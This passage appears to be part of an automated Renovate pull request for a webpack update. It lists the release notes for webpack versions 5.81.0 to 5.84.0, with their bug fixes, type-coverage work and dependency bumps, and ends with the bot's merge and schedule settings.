[https://github.com/webpack/webpack/pull/17233](https://redirect.github.com/webpack/webpack/pull/17233) - Allow DefinePlugin shorthand property by [@​shamoilarsi](https://redirect.github.com/shamoilarsi) in [https://github.com/webpack/webpack/pull/17231](https://redirect.github.com/webpack/webpack/pull/17231) - \[CSS] - Fix edge cases in parsing `@import` by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17229](https://redirect.github.com/webpack/webpack/pull/17229) #### Developer Experience - Increase type coverage for serialization classes by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17243](https://redirect.github.com/webpack/webpack/pull/17243) - Increase type coverage for `JavascriptParser` and `ModuleDependency` subclasses by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17236](https://redirect.github.com/webpack/webpack/pull/17236) - Increase type coverage to `strict`-mode quality for Configuration/Normalization objects by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17247](https://redirect.github.com/webpack/webpack/pull/17247) - Refactor duplicate strings by replacing them with constant for **webpack_require** instead of string literal by [@​burhanuday](https://redirect.github.com/burhanuday) in [https://github.com/webpack/webpack/pull/17228](https://redirect.github.com/webpack/webpack/pull/17228) - Add test case for `with { type: "json" }` by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17230](https://redirect.github.com/webpack/webpack/pull/17230) - Add test case for destructuring by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17248](https://redirect.github.com/webpack/webpack/pull/17248) #### Dependencies & Maintenance - Add GitHub discussions badge in README by [@​snitin315](https://redirect.github.com/snitin315) in [https://github.com/webpack/webpack/pull/17251](https://redirect.github.com/webpack/webpack/pull/17251) - Bump enhanced-resolve to 5.14.1 by [@​TheLarkInn](https://redirect.github.com/TheLarkInn) in [https://github.com/webpack/webpack/pull/17257](https://redirect.github.com/webpack/webpack/pull/17257) - Bump [@​types/node](https://redirect.github.com/types/node) from 20.1.7 to 20.2.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17219](https://redirect.github.com/webpack/webpack/pull/17219) - Bump [@​types/node](https://redirect.github.com/types/node) from 20.2.0 to 20.2.1 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17226](https://redirect.github.com/webpack/webpack/pull/17226) - Bump webpack-cli from 5.1.0 to 5.1.1 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17164](https://redirect.github.com/webpack/webpack/pull/17164) - Bump eslint from 8.39.0 to 8.40.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17148](https://redirect.github.com/webpack/webpack/pull/17148) - Bump [@​babel/core](https://redirect.github.com/babel/core) from 7.21.4 to 7.21.8 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17126](https://redirect.github.com/webpack/webpack/pull/17126) - Bump [@​types/node](https://redirect.github.com/types/node) from 20.2.1 to 20.2.3 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17238](https://redirect.github.com/webpack/webpack/pull/17238) - Bump eslint from 8.40.0 to 8.41.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17237](https://redirect.github.com/webpack/webpack/pull/17237) #### New Contributors - [@​shamoilarsi](https://redirect.github.com/shamoilarsi) made their first contribution in [https://github.com/webpack/webpack/pull/17231](https://redirect.github.com/webpack/webpack/pull/17231) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.83.1...v5.84.0 ### [`v5.83.1`](https://redirect.github.com/webpack/webpack/releases/tag/v5.83.1) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.83.0...v5.83.1) #### Bug Fixes - Fix regression in import/export normailization effecting mini-css-extract-plugin by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17214](https://redirect.github.com/webpack/webpack/pull/17214) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.83.0...v5.83.1 ### [`v5.83.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.83.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.82.1...v5.83.0) #### New Features - Normalize property access for imports and exports by [@​bworline](https://redirect.github.com/bworline) in [https://github.com/webpack/webpack/pull/17137](https://redirect.github.com/webpack/webpack/pull/17137) - Top Level Await is now enabled by default by [@​burhanuday](https://redirect.github.com/burhanuday) in [https://github.com/webpack/webpack/pull/17192](https://redirect.github.com/webpack/webpack/pull/17192) #### Bug Fixes - Correct `chunkgroup.groupsIterable` return type by [@​TheLarkInn](https://redirect.github.com/TheLarkInn) in [https://github.com/webpack/webpack/pull/17196](https://redirect.github.com/webpack/webpack/pull/17196) - Fix bug in Rule Matcher type by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17207](https://redirect.github.com/webpack/webpack/pull/17207) - Fixed apply event callback and optimizing callback event type by [@​nuintun](https://redirect.github.com/nuintun) in [https://github.com/webpack/webpack/pull/16094](https://redirect.github.com/webpack/webpack/pull/16094) - Fix types in hot module replacement APIs by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17193](https://redirect.github.com/webpack/webpack/pull/17193) #### Developer Experience - Expose `ChunkGroup` to type definitions by [@​TheLarkInn](https://redirect.github.com/TheLarkInn) in [https://github.com/webpack/webpack/pull/17201](https://redirect.github.com/webpack/webpack/pull/17201) - Add `NormalModuleFactory`'s `ResolveData` type to public interface by [@​TheLarkInn](https://redirect.github.com/TheLarkInn) in [https://github.com/webpack/webpack/pull/17195](https://redirect.github.com/webpack/webpack/pull/17195) - Document `compilation.afterChunks` hook by [@​TheLarkInn](https://redirect.github.com/TheLarkInn) in [https://github.com/webpack/webpack/pull/17202](https://redirect.github.com/webpack/webpack/pull/17202) #### Dependencies & Maintenance - Bump [@​webassemblyjs/wasm-edit](https://redirect.github.com/webassemblyjs/wasm-edit) from 1.11.5 to 1.11.6 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17168](https://redirect.github.com/webpack/webpack/pull/17168) - Bump wast-loader from 1.11.5 to 1.11.6 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17163](https://redirect.github.com/webpack/webpack/pull/17163) - Bump yarn-deduplicate from 6.0.1 to 6.0.2 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17184](https://redirect.github.com/webpack/webpack/pull/17184) - Fix command by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17154](https://redirect.github.com/webpack/webpack/pull/17154) - Bump [@​types/node](https://redirect.github.com/types/node) from 18.16.3 to 20.1.7 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17205](https://redirect.github.com/webpack/webpack/pull/17205) #### New Contributors - [@​bworline](https://redirect.github.com/bworline) made their first contribution in [https://github.com/webpack/webpack/pull/17137](https://redirect.github.com/webpack/webpack/pull/17137) - [@​nuintun](https://redirect.github.com/nuintun) made their first contribution in [https://github.com/webpack/webpack/pull/16094](https://redirect.github.com/webpack/webpack/pull/16094) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.82.1...v5.83.0 ### [`v5.82.1`](https://redirect.github.com/webpack/webpack/releases/tag/v5.82.1) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.82.0...v5.82.1) #### Bug Fixes - \[CSS] - Support nesting in CSS modules and bug fixes by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17133](https://redirect.github.com/webpack/webpack/pull/17133) - \[CSS] - Fix crash with `importModule` when CSS enabled by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17140](https://redirect.github.com/webpack/webpack/pull/17140) - Fix bug where `output.hashFunction` was failing to generate debug hash by [@​ahabhgk](https://redirect.github.com/ahabhgk) in [https://github.com/webpack/webpack/pull/16950](https://redirect.github.com/webpack/webpack/pull/16950) - Reduce the amount of generated code for chunk loading by [@​lvivski](https://redirect.github.com/lvivski) in [https://github.com/webpack/webpack/pull/17151](https://redirect.github.com/webpack/webpack/pull/17151) - Use module preload for ESM module output by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17143](https://redirect.github.com/webpack/webpack/pull/17143) #### Developer Experience - Improve module type strictness for Module.prototype.type expand ModuleTypeConstants by [@​TheLarkInn](https://redirect.github.com/TheLarkInn) in [https://github.com/webpack/webpack/pull/17136](https://redirect.github.com/webpack/webpack/pull/17136) #### Dependencies & Maintenance - Update package.json description by [@​JeraldVin](https://redirect.github.com/JeraldVin) in [https://github.com/webpack/webpack/pull/17145](https://redirect.github.com/webpack/webpack/pull/17145) - Bump webpack-cli from 5.0.2 to 5.1.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17146](https://redirect.github.com/webpack/webpack/pull/17146) - Bump core-js from 3.30.1 to 3.30.2 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17149](https://redirect.github.com/webpack/webpack/pull/17149) - Bump enhanced-resolve to v5.14.0 by [@​snitin315](https://redirect.github.com/snitin315) in [https://github.com/webpack/webpack/pull/17160](https://redirect.github.com/webpack/webpack/pull/17160) #### New Contributors - [@​JeraldVin](https://redirect.github.com/JeraldVin) made their first contribution in [https://github.com/webpack/webpack/pull/17145](https://redirect.github.com/webpack/webpack/pull/17145) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.82.0...v5.82.1 ### [`v5.82.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.82.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.81.0...v5.82.0) #### New Features - \[CSS] - Add URL dependencies support to consume shared module via module federation by [@​snitin315](https://redirect.github.com/snitin315) in [https://github.com/webpack/webpack/pull/16945](https://redirect.github.com/webpack/webpack/pull/16945) - Allow webpack-cli to be in ESM by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17088](https://redirect.github.com/webpack/webpack/pull/17088) - Allow specifying "onPolicyCreationFailure" mode for trusted types by [@​Zlatkovsky](https://redirect.github.com/Zlatkovsky) in [https://github.com/webpack/webpack/pull/16990](https://redirect.github.com/webpack/webpack/pull/16990) #### Bug Fixes - \[CSS] - Respect `media`/`supports`/`layer` from parent CSS module by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17115](https://redirect.github.com/webpack/webpack/pull/17115) - \[CSS] - Add warning & support for any [@​import](https://redirect.github.com/import) rules must precede all other rules by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17118](https://redirect.github.com/webpack/webpack/pull/17118) - \[CSS] - Support handling `#hash` URL as external (similar to Parcel) by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17116](https://redirect.github.com/webpack/webpack/pull/17116) - Optimize numberHash.js performance by removing inner loops by [@​alexkuz](https://redirect.github.com/alexkuz) in [https://github.com/webpack/webpack/pull/17074](https://redirect.github.com/webpack/webpack/pull/17074) - Improve template string comparison algorithm by [@​An0nie](https://redirect.github.com/An0nie) in [https://github.com/webpack/webpack/pull/17079](https://redirect.github.com/webpack/webpack/pull/17079) #### Tests & Contributor Experience - \[CSS] - Increase imports external test coverage by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17089](https://redirect.github.com/webpack/webpack/pull/17089) - Improve PR reliability via ignoring unstable coverage by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17106](https://redirect.github.com/webpack/webpack/pull/17106) - Update webpack types to support extends property in webpack (for webpack-cli) by [@​burhanuday](https://redirect.github.com/burhanuday) in [https://github.com/webpack/webpack/pull/17113](https://redirect.github.com/webpack/webpack/pull/17113) #### Developer Experience - Increase type coverage and documentation for `StringXor` class. by [@​TheLarkInn](https://redirect.github.com/TheLarkInn) in [https://github.com/webpack/webpack/pull/17070](https://redirect.github.com/webpack/webpack/pull/17070) - Increase type coverage & docs for `numberHash` by [@​TheLarkInn](https://redirect.github.com/TheLarkInn) in [https://github.com/webpack/webpack/pull/17072](https://redirect.github.com/webpack/webpack/pull/17072) - Increase type coverage & docs for `JavascriptParser` by [@​TheLarkInn](https://redirect.github.com/TheLarkInn) in [https://github.com/webpack/webpack/pull/17094](https://redirect.github.com/webpack/webpack/pull/17094) - Increase type coverage & docs for `BasicEvaluatedExpression` by [@​TheLarkInn](https://redirect.github.com/TheLarkInn) in [https://github.com/webpack/webpack/pull/17096](https://redirect.github.com/webpack/webpack/pull/17096) - Increase type coverage for CSS module type by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17097](https://redirect.github.com/webpack/webpack/pull/17097) - Increase type coverage for JSON module type by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17095](https://redirect.github.com/webpack/webpack/pull/17095) - Increase type coverage & docs for multiple utility classes by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17107](https://redirect.github.com/webpack/webpack/pull/17107) #### Dependencies & Maintenance - chore(deps-dev): bump lint-staged from 13.2.1 to 13.2.2 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17075](https://redirect.github.com/webpack/webpack/pull/17075) - chore(deps-dev): bump eslint from 8.38.0 to 8.39.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17052](https://redirect.github.com/webpack/webpack/pull/17052) - chore(deps-dev): bump assemblyscript from 0.27.3 to 0.27.4 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17064](https://redirect.github.com/webpack/webpack/pull/17064) - chore(deps-dev): bump assemblyscript from 0.27.4 to 0.27.5 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17109](https://redirect.github.com/webpack/webpack/pull/17109) - chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node) from 18.16.2 to 18.16.3 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17112](https://redirect.github.com/webpack/webpack/pull/17112) - chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node) from 18.15.13 to 18.16.2 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17084](https://redirect.github.com/webpack/webpack/pull/17084) - chore(deps-dev): bump webpack-cli from 5.0.1 to 5.0.2 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17054](https://redirect.github.com/webpack/webpack/pull/17054) - chore(deps-dev): bump date-fns from 2.29.3 to 2.30.0 by [@​dependabot](https://redirect.github.com/dependabot) in [https://github.com/webpack/webpack/pull/17111](https://redirect.github.com/webpack/webpack/pull/17111) #### New Contributors - [@​An0nie](https://redirect.github.com/An0nie) made their first contribution in [https://github.com/webpack/webpack/pull/17079](https://redirect.github.com/webpack/webpack/pull/17079) - [@​burhanuday](https://redirect.github.com/burhanuday) made their first contribution in [https://github.com/webpack/webpack/pull/17113](https://redirect.github.com/webpack/webpack/pull/17113) - [@​Zlatkovsky](https://redirect.github.com/Zlatkovsky) made their first contribution in [https://github.com/webpack/webpack/pull/16990](https://redirect.github.com/webpack/webpack/pull/16990) **Full Changelog**: https://github.com/webpack/webpack/compare/v5.81.0...v5.82.0 ### [`v5.81.0`](https://redirect.github.com/webpack/webpack/releases/tag/v5.81.0) [Compare Source](https://redirect.github.com/webpack/webpack/compare/v5.80.0...v5.81.0) #### New Features - \[CSS] - Increased CSS import support and new hooks included for CSS module creation by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17057](https://redirect.github.com/webpack/webpack/pull/17057) - Logging now added to DefinePlugin by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17048](https://redirect.github.com/webpack/webpack/pull/17048) - New `ignoreBrowserWarnings` option to ignore browser console warnings in ModuleFederation by [@​indeediansbrett](https://redirect.github.com/indeediansbrett) in [https://github.com/webpack/webpack/pull/16388](https://redirect.github.com/webpack/webpack/pull/16388) #### Bug Fixes - \[CSS] - Fix issue where vendor prefixed keyframes and animation was not supported in CSS modules by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/16975](https://redirect.github.com/webpack/webpack/pull/16975) - Fix bug where AST was not properly handled by [@​quanru](https://redirect.github.com/quanru) in [https://github.com/webpack/webpack/pull/17032](https://redirect.github.com/webpack/webpack/pull/17032) - Fix automatic publicPath detection logic by [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17047](https://redirect.github.com/webpack/webpack/pull/17047) #### Tests & Contributor Experience - Rename `provide` to `getOrInsert` in MapHelpers and document it better by [@​TheLarkInn](https://redirect.github.com/TheLarkInn) in [https://github.com/webpack/webpack/pull/17060](https://redirect.github.com/webpack/webpack/pull/17060) - Increase test reliability for DefinePlugin [@​alexander-akait](https://redirect.github.com/alexander-akait) in [https://github.com/webpack/webpack/pull/17062](https://redirect.github.com/web

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Berlin, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

This PR was generated by Mend Renovate. View the repository job log.